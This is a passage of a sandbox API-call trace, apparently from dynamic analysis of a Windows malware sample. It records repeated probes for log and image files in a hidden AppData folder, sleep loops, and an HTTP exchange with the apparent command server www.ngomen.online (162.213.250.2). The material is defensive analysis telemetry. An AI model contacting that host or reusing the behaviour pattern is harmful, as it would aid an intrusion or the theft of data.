NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.901] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.901] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.901] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.901] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.901] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.902] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.902] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.902] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.902] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.902] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.902] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.902] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.902] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.902] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.902] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.902] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.902] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.902] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.902] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.902] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.902] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.902] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.902] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.902] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.902] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.902] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.903] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0229.903] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.903] Sleep (dwMilliseconds=0x7d0) [0229.916] Sleep (dwMilliseconds=0x7d0) [0229.932] Sleep (dwMilliseconds=0x7d0) [0229.965] Sleep (dwMilliseconds=0x7d0) [0229.979] Sleep (dwMilliseconds=0x7d0) [0229.994] Sleep (dwMilliseconds=0x7d0) [0230.010] Sleep (dwMilliseconds=0x7d0) [0230.030] Sleep (dwMilliseconds=0x7d0) [0230.041] Sleep (dwMilliseconds=0x7d0) [0230.056] Sleep (dwMilliseconds=0x7d0) [0230.072] Sleep (dwMilliseconds=0x7d0) [0230.092] Sleep (dwMilliseconds=0x7d0) [0230.103] Sleep (dwMilliseconds=0x7d0) [0230.119] Sleep (dwMilliseconds=0x7d0) [0230.135] Sleep (dwMilliseconds=0x7d0) [0230.155] Sleep (dwMilliseconds=0x7d0) [0230.166] Sleep (dwMilliseconds=0x7d0) [0230.182] Sleep (dwMilliseconds=0x7d0) [0230.197] Sleep (dwMilliseconds=0x7d0) [0230.213] Sleep (dwMilliseconds=0x7d0) [0230.228] Sleep (dwMilliseconds=0x7d0) [0230.244] Sleep (dwMilliseconds=0x7d0) [0230.259] Sleep (dwMilliseconds=0x7d0) [0230.275] Sleep (dwMilliseconds=0x7d0) [0230.290] Sleep (dwMilliseconds=0x7d0) [0230.306] Sleep (dwMilliseconds=0x7d0) [0236.748] socket (af=2, type=1, protocol=6) returned 0xa90 [0236.750] getaddrinfo (in: pNodeName="www.ngomen.online", pServiceName="80", pHints=0x6f0b078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0b0a8 | out: ppResult=0x6f0b0a8*=0x6eff730*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f35c80*(sa_family=2, sin_port=0x50, sin_addr="162.213.250.2"), ai_next=0x0)) returned 0 [0236.806] connect (s=0xa90, name=0x3f35c80*(sa_family=2, sin_port=0x50, sin_addr="162.213.250.2"), namelen=16) returned 0 [0236.981] send (s=0xa90, buf=0x25a505a*, len=169, flags=0) returned 169 [0236.982] Sleep (dwMilliseconds=0x1f4) [0236.983] setsockopt (s=0xa90, level=65535, optname=4102, optval="¸\x0b", optlen=4) returned 0 [0236.983] recv (in: s=0xa90, buf=0x8cc7440, len=2048000, flags=0 | out: buf=0x8cc7440*) returned 459 [0237.252] recv (in: s=0xa90, buf=0x8cc760b, len=2047541, flags=0 | out: buf=0x8cc760b) returned 0 [0237.252] closesocket (s=0xa90) returned 0 [0237.253] Sleep (dwMilliseconds=0x7d0) [0237.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.264] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.264] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0237.264] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.264] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.264] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.265] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.265] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.265] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.265] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.265] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.265] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.265] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.265] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.265] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.265] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.265] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.265] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.265] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.266] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.266] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.266] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.266] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.266] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.266] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.266] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.266] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.266] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.266] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.266] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.266] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.266] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.266] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.266] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.266] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.266] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, 